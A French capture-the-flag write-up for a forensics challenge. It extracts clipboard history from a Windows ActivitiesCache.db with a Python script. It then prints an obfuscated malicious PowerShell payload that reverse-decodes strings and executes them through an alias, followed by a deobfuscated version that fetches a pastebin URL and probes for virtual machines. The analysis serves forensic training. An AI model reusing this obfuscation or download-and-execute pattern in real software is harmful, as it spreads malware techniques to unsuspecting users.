Clipbored

Flag: ECW{c1ippy_is_b4ck}

Challenge

481KB

Solution

Ici, on a besoin uniquement de ActivitiesCache.db. On peut soit l'ouvrir avec VSCode avec une extension comme SQLite Viewer, ou utiliser du Python etc...

Dans la table ActivityOperation, on trouve la colonne ClipboardPayload. Elle contient ce qui a été dans le presse-papier. Voici en python un script qui permet d'afficher le contenu :

from base64 import b64decode
import json
import sqlite3

con = sqlite3.connect('ActivitiesCache.db')
cur = con.cursor()

for id, clipboard in cur.execute("SELECT id, ClipboardPayload FROM ActivityOperation WHERE ClipboardPayload NOT NULL"):
  data = json.loads(clipboard)[0]
  decoded = b64decode(data.get("content"))
  print(f"# {id.hex()}\n{decoded}\n\n")

[...]

# 57ce719e79730093e4aee5f133da7367
b'$w28NqcUIX5lRgFKkVjr = "oQfgACIgogIpojIgQ3cvhULlRXaydFIgowegU2csVGI9BCIgACIgACIgoQZ0FGdTBCLl1WYOBCdjVmai9UL0NWZsV2UgwHINZVL0V2RgAiCioDIzVWqCP4w0NWZ0lqwDOMZgkiVtIXZwlHSoAyclxGblVHdylmdgMXZulGajFWTuBmIgQ3cvhULlRXaydFIgowegkSZ15Wa052bDlHb05WZsl2Ug42bpR3YBJ3byJXRtASTW1CdldEIk5WYt12bD1CdldEKgYWagACIgACIgAiCiUUTB5kUFRVVQ10TDpjdOVEJiACdz9GStUGdpJ3VgACIKIiUPJlUFJCI0N3bI1SZ0lmcXBCIgACIgowZul2cyFGUjl2chJUZzVVLgkTOlZHaBVHaIlGJgkmcV1CI0NXZ1FXZSJWZX1SZr9mdulEI9ASO5MkUHN0ZkZkYkAiCgIiY4ZGRThGTp9SbvNmLulmYlR3chB3LvoDc0RHaiASPgkTOlZHaBVHaIlGJ" ;\r\n$LQXFFhOyV3kG3h = $w28NqcUIX5lRgFKkVjr.ToCharArray() ; [array]::Reverse($LQXFFhOyV3kG3h) ; $aKgSUqrZt90l8W3egtLj = -join $LQXFFhOyV3kG3h ;\r\n$3EvXkLAZ4csMaJiPDoV = switch ($aKgSUqrZt90l8W3egtLj.Length % 4) { 0 { $aKgSUqrZt90l8W3egtLj }; 1 { $aKgSUqrZt90l8W3egtLj.Substring(0, $aKgSUqrZt90l8W3egtLj.Length - 1) }; 2 { $aKgSUqrZt90l8W3egtLj + ("=" * 2) }; 3 { $aKgSUqrZt90l8W3egtLj + "=" }} ;\r\n$6qDd0BfJgjI7T = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($3EvXkLAZ4csMaJiPDoV)) ;\r\n$PKCDS1W3rSva0RJRLP = \'42bpN1clJHc4VULFt2bW5Wa\'.ToCharArray() ; [array]::Reverse($PKCDS1W3rSva0RJRLP) ; $AkZF = -join $PKCDS1W3rSva0RJRLP ;\r\n$AkZF = switch ($AkZF.Length % 4) { 0 { $AkZF }; 1 { $AkZF.Substring(0, $AkZF.Length - 1) }; 2 { $AkZF + \'=\' * 2 }; 3 { $AkZF + \'=\' } } ;\r\n$aRAT = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($AkZF)) ;\r\n$duH9JBF4r3EPjV = \'wcNNUa\'.ToCharArray() ; [array]::Reverse($duH9JBF4r3EPjV) ; $3Nbnv6FKlWu17qTmUJE = -join $duH9JBF4r3EPjV ;\r\n$3Nbnv6FKlWu17qTmUJE = switch ($3Nbnv6FKlWu17qTmUJE.Length % 4) { 0 { $3Nbnv6FKlWu17qTmUJE }; 1 { $3Nbnv6FKlWu17qTmUJE.Substring(0, $3Nbnv6FKlWu17qTmUJE.Length - 1) }; 2 { $3Nbnv6FKlWu17qTmUJE + \'=\' * 2 }; 3 { $3Nbnv6FKlWu17qTmUJE + \'=\' } } ;\r\n$cHYatTyod927pqLbeDsfKxVNW = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($3Nbnv6FKlWu17qTmUJE)) ;\r\n$NULl = NeW-ALIAs -namE $cHYatTyod927pqLbeDsfKxVNW -vAlUe $aRAT -FoRCe ; & $cHYatTyod927pqLbeDsfKxVNW $6qDd0BfJgjI7T ;\r\n'

[...]

C'est un script PowerShell malveillant. On va le rendre plus lisible, soit avec un LLM, soit à la main.

Au final, on obtiens :

$iHhuAhve99 = "http://pastebin.com/iLhSDfxb"
$bFdgCGRC99 = Invoke-WebRequest -Uri $iHhuAhve99 -UseBasicParsing
Write-Host "ERROR"
Write-Host "$ENv:COMPUTERNAME"
if (Get-Command Get-VM -ErrorAction SilentlyContinue) {
    Write-Host "`nMachines virtuelles (Hyper-V) détectées :"
    Get-VM | Select-Object Name, State
} else {
    Write-Host ":)"
}

Le lien pastebin mène au flag :

PrécédentAlice_In_Rans0ml4nd SuivantJobstacle_I

Mis à jour il y a 3 mois

hashtagChallenge

hashtagSolution

Challenge

Solution